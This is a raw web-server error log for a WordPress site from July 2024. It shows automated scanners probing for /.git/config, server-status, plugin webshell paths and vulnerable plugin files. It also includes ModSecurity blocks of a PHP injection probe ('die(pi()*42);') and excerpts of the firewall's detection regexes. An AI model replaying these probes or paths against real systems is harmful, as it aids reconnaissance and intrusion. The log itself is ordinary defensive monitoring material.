02:46:41.978250 2024] [authz_core:error] [pid 14922:tid 140399712589568] [client 172.105.16.117:36698] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/18 02:46:45 [error] 14881#14881: *101406 access forbidden by rule, client: 172.105.16.117, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Jul 18 03:20:21.602474 2024] [ssl:warn] [pid 31186:tid 140666645796736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 18 03:20:33.908287 2024] [ssl:warn] [pid 31187:tid 140666645796736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 18 03:20:34.499423 2024] [ssl:warn] [pid 31187:tid 140666645796736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 18 03:20:36.367288 2024] [ssl:warn] [pid 31187:tid 140666645796736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 18 03:20:38.751521 2024] [ssl:warn] [pid 31603:tid 140207158433664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 18 03:20:50.982763 2024] [ssl:warn] [pid 31605:tid 140207158433664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 18 03:55:11.020951 2024] [authz_core:error] [pid 32244:tid 140206975686400] [client 164.90.208.56:37446] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/18 03:55:14 [error] 31584#31584: *101797 access forbidden by rule, client: 164.90.208.56, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jul 18 08:49:35.884704 2024] [authz_core:error] [pid 31628:tid 140206850172672] [client 142.93.143.8:41400] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/18 08:49:39 [error] 31584#31584: *104039 access forbidden by rule, client: 142.93.143.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Jul 19 03:12:21.547297 2024] [ssl:warn] [pid 12978:tid 140640432523136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 19 03:12:29.783229 2024] [ssl:warn] [pid 12980:tid 140640432523136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 19 03:12:30.236145 2024] [ssl:warn] [pid 12980:tid 140640432523136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 19 03:12:32.548045 2024] [ssl:warn] [pid 12980:tid 140640432523136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 19 03:12:34.901325 2024] [ssl:warn] [pid 13396:tid 140242119120768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 19 03:12:47.140207 2024] [ssl:warn] [pid 13397:tid 140242119120768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jul 19 22:44:07.366472 2024] [authz_core:error] [pid 13419:tid 140241788712704] [client 146.190.103.103:52440] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/19 22:44:13 [error] 13378#13378: *124693 access forbidden by rule, client: 146.190.103.103, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Jul 20 01:25:46.371252 2024] [authz_core:error] [pid 14044:tid 140241797105408] [client 138.197.191.87:54380] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/20 01:25:50 [error] 13377#13377: *125627 access forbidden by rule, client: 138.197.191.87, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Jul 20 03:26:20.522432 2024] [ssl:warn] [pid 3130:tid 139764641032064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 20 03:26:28.768350 2024] [ssl:warn] [pid 3131:tid 139764641032064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 20 03:26:29.159638 2024] [ssl:warn] [pid 3131:tid 139764641032064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 20 03:26:31.682104 2024] [ssl:warn] [pid 3131:tid 139764641032064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 20 03:26:33.976111 2024] [ssl:warn] [pid 3551:tid 140253295912832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 20 03:26:42.281144 2024] [ssl:warn] [pid 3554:tid 140253295912832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 20 03:26:43.050847 2024] [ssl:warn] [pid 3554:tid 140253295912832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 20 09:03:15.944716 2024] [authz_core:error] [pid 3708:tid 140253004285696] [client 164.92.244.132:58216] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/20 09:03:19 [error] 3670#3670: *128225 access forbidden by rule, client: 164.92.244.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Jul 21 03:38:25.997214 2024] [ssl:warn] [pid 20809:tid 140544414918528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 21 03:38:38.431021 2024] [ssl:warn] [pid 20815:tid 140544414918528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 21 03:38:38.826005 2024] [ssl:warn] [pid 20815:tid 140544414918528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 21 03:38:41.412810 2024] [ssl:warn] [pid 20815:tid 140544414918528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 21 03:38:43.697525 2024] [ssl:warn] [pid 21316:tid 139862963410816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 21 03:38:56.057439 2024] [ssl:warn] [pid 21322:tid 139862963410816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 22 01:15:57.619401 2024] [authz_core:error] [pid 22224:tid 139862531311360] [client 167.71.81.114:56464] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/22 01:16:00 [error] 21200#21200: *144786 access forbidden by rule, client: 167.71.81.114, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Jul 22 03:35:29.519120 2024] [ssl:warn] [pid 463:tid 140031964084096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 22 03:35:41.995318 2024] [ssl:warn] [pid 464:tid 140031964084096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 22 03:35:42.718658 2024] [ssl:warn] [pid 464:tid 140031964084096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 22 03:35:45.118754 2024] [ssl:warn] [pid 464:tid 140031964084096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 22 03:35:47.518957 2024] [ssl:warn] [pid 964:tid 139987393841024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 22 03:35:55.808547 2024] [ssl:warn] [pid 971:tid 139987393841024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 22 05:39:01.826842 2024] [authz_core:error] [pid 2173:tid 139987202701056] [client 64.23.159.209:58982] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/22 05:39:06 [error] 944#944: *146416 access forbidden by rule, client: 64.23.159.209, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jul 22 07:06:57.499372 2024] [authz_core:error] [pid 2173:tid 139987160737536] [client 172.105.158.219:59468] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/22 07:07:00 [error] 944#944: *146707 access forbidden by rule, client: 172.105.158.219, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jul 23 03:20:22.232877 2024] [ssl:warn] [pid 29305:tid 140283553601408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 23 03:20:30.592645 2024] [ssl:warn] [pid 29307:tid 140283553601408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 23 03:20:31.145354 2024] [ssl:warn] [pid 29307:tid 140283553601408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 23 03:20:33.746951 2024] [ssl:warn] [pid 29307:tid 140283553601408] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 23 03:20:36.167225 2024] [ssl:warn] [pid 29782:tid 140309152475008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 23 03:20:44.450396 2024] [ssl:warn] [pid 29790:tid 140309152475008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 24 02:14:34.959367 2024] [authz_core:error] [pid 29812:tid 140308721362688] [client 64.226.65.160:38344] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/24 02:14:38 [error] 29764#29764: *165118 access forbidden by rule, client: 64.226.65.160, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Jul 24 03:06:20.306836 2024] [ssl:warn] [pid 19444:tid 139898402531200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 24 03:06:32.520045 2024] [ssl:warn] [pid 19445:tid 139898402531200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 24 03:06:33.060977 2024] [ssl:warn] [pid 19445:tid 139898402531200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 24 03:06:35.406980 2024] [ssl:warn] [pid 19445:tid 139898402531200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 24 03:06:37.826356 2024] [ssl:warn] [pid 19861:tid 140174645323648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 24 03:06:42.035025 2024] [ssl:warn] [pid 19862:tid 140174645323648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 24 03:21:58.691007 2024] [authz_core:error] [pid 19883:tid 140174293948160] [client 146.190.103.103:38956] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/24 03:22:08 [error] 19842#19842: *165391 access forbidden by rule, client: 146.190.103.103, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jul 24 03:48:40.351827 2024] [authz_core:error] [pid 19881:tid 140174344304384] [client 209.97.180.8:39232] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/24 03:48:43 [error] 19843#19843: *165565 access forbidden by rule, client: 209.97.180.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jul 24 09:52:27.090740 2024] [authz_core:error] [pid 19883:tid 140174268770048] [client 172.105.16.34:43412] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/24 09:52:30 [error] 19843#19843: *167911 access forbidden by rule, client: 172.105.16.34, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/07/24 17:33:22 [error] 14390#14390: *172153 access forbidden by rule, client: 46.101.111.185, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/24 17:33:23 [error] 14389#14389: *172214 access forbidden by rule, client: 139.162.155.225, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/24 17:33:25 [error] 14390#14390: *172272 access forbidden by rule, client: 206.189.2.13, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/24 17:33:28 [error] 14390#14390: *172303 access forbidden by rule, client: 139.162.96.14, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Wed Jul 24 17:33:29.985679 2024] [authz_core:error] [pid 14426:tid 140174277162752] [client 139.162.155.225:52454] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Wed Jul 24 17:33:30.032609 2024] [authz_core:error] [pid 14428:tid 140174268770048] [client 157.245.36.108:52452] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Wed Jul 24 17:33:30.606929 2024] [authz_core:error] [pid 14548:tid 140174310733568] [client 64.226.65.160:52464] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/24 17:33:34 [error] 14389#14389: *172351 access forbidden by rule, client: 139.162.155.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/07/24 17:33:35 [error] 14390#14390: *172355 access forbidden by rule, client: 157.245.36.108, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/07/24 17:33:35 [error] 14390#14390: *172360 access forbidden by rule, client: 64.226.65.160, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jul 24 20:12:35.204237 2024] [:error] [pid 14548:tid 140174454183680] [client 45.227.254.34:54824] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/image/ico/s_ne.php"] [unique_id "ZqGmg9ogaW-tkWiibWb_tAAAAME"] 2024/07/24 22:16:30 [error] 14390#14390: *174355 access forbidden by rule, client: 179.43.188.122, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Jul 25 07:24:51.280826 2024] [:error] [pid 19005:tid 140433694852864] [client 45.227.254.34:35334] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/s_e.php"] [unique_id "ZqJEExNOsip8Ab9ww5YArQAAAJU"] [Thu Jul 25 17:01:23.473937 2024] [autoindex:error] [pid 19005:tid 140433703245568] [client 143.244.131.112:44152] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Jul 25 20:31:37.613539 2024] [:error] [pid 19260:tid 140433812350720] [client 45.227.254.34:46460] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/background-image-cropper/image/ico/s_e.php"] [unique_id "ZqL8eSRHJoKBK8zRsmT85AAAAMc"] 2024/07/25 21:31:58 [error] 18853#18853: *184256 access forbidden by rule, client: 83.147.52.49, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/07/25 22:14:23 [error] 18853#18853: *184468 access forbidden by rule, client: 83.147.52.49, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/07/25 23:43:45 [error] 18853#18853: *184922 access forbidden by rule, client: 45.148.10.142, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/26 00:05:41 [error] 18854#18854: *185131 access forbidden by rule, client: 45.148.10.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/07/26 00:18:06 [error] 18853#18853: *185192 access forbidden by rule, client: 45.148.10.142, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/26 00:55:19 [error] 18854#18854: *185327 access forbidden by rule, client: 192.99.149.111, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/26 00:55:21 [error] 18854#18854: *185333 access forbidden by rule, client: 109.70.100.4, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/26 01:10:00 [error] 18854#18854: *185469 access forbidden by rule, client: 45.148.10.142, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Fri Jul 26 15:57:21.789091 2024] [autoindex:error] [pid 2333:tid 140671377729280] [client 4.213.141.139:36828] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jul 26 17:59:13.744088 2024] [authz_core:error] [pid 2333:tid 140671318980352] [client 159.89.12.166:43716] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/26 17:59:18 [error] 15945#15945: *197488 access forbidden by rule, client: 159.89.12.166, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Jul 26 20:23:12.401162 2024] [authz_core:error] [pid 16085:tid 140671302194944] [client 157.230.19.140:47164] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/26 20:23:16 [error] 15944#15944: *198806 access forbidden by rule, client: 157.230.19.140, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Jul 26 21:41:11.018347 2024] [authz_core:error] [pid 16703:tid 140671377729280] [client 139.162.155.225:48078] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/26 21:41:14 [error] 15944#15944: *199344 access forbidden by rule, client: 139.162.155.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Jul 27 03:15:59.783080 2024] [:error] [pid 2333:tid 140671243446016] [client 47.128.254.60:52466] [client 47.128.254.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "Web Downloader"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu.com/wp-content/themes/zerif-lite/js/html5.js"] [unique_id "ZqSsv286nKT-4WnFsuQ_twAAARc"] [Sat Jul 27 03:16:16.577419 2024] [:error] [pid 16085:tid 140671251838720] [client 47.128.254.60:52496] [client 47.128.254.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "EmailWolf"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu.com/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZqSs0M-FsBR8gNC4urflKgAAAJY"] [Sat Jul 27 05:25:10.786888 2024] [:error] [pid 6960:tid 140578213840640] [client 45.227.254.34:33294] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/haccess.php"] [unique_id "ZqTLBrfaGejlZP8JiQZv5gAAAMY"] [Sat Jul 27 16:24:49.552721 2024] [autoindex:error] [pid 6329:tid 140578180269824] [client 165.22.211.167:43010] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jul 27 19:13:41.905316 2024] [authz_core:error] [pid 6329:tid 140578222233344] [client 164.90.208.56:45402] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/27 19:13:45 [error] 6287#6287: *211697 access forbidden by rule, client: 164.90.208.56, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Jul 28 06:30:47.584341 2024] [autoindex:error] [pid 25577:tid 140050729744128] [client 52.237.251.117:55078] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Sun Jul 28 06:30:59.116616 2024] [autoindex:error] [pid 25577:tid 140050738136832] [client 52.237.251.117:55104] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jul 28 06:31:26.594089 2024] [autoindex:error] [pid 25577:tid 140050830456576] [client 52.237.251.117:55162] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jul 28 06:31:33.196823 2024] [:error] [pid 25577:tid 140050704566016] [client 52.237.251.117:55180] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Jul 28 06:31:33.405657 2024] [:error] [pid 25446:tid 140050729744128] [client 52.237.251.117:55182] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Jul 28 10:15:24.878293 2024] [:error] [pid 25577:tid 140050813671168] [client 41.231.54.165:58234] [client 41.231.54.165] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-automatic/inc/csv.php"] [unique_id "ZqZgjMhZbTYCdd8iye5kywAAAMY"] [Sun Jul 28 17:34:57.001980 2024] [authz_core:error] [pid 25447:tid 140050805278464] [client 209.38.208.202:37010] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/28 17:35:01 [error] 25321#25321: *224374 access forbidden by rule, client: 209.38.208.202, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/07/29 00:45:19 [error] 17366#17366: *230238 access forbidden by rule, client: 165.227.39.235, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/29 00:45:19 [error] 17366#17366: *230285 access forbidden by rule, client: 206.189.233.36, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/07/29 00:45:19 [error] 17367#17367: *230300 access forbidden by rule, client: 172.105.16.105, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/29 00:45:20 [error] 17366#17366: *230361 access forbidden by rule, client: 64.23.159.209, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/29 00:45:24 [error] 17366#17366: *230457 access forbidden by rule, client: 147.182.200.94, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Mon Jul 29 00:45:29.565445 2024] [authz_core:error] [pid 17398:tid 140050908870400] [client 23.239.21.238:47258] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/29 00:45:30 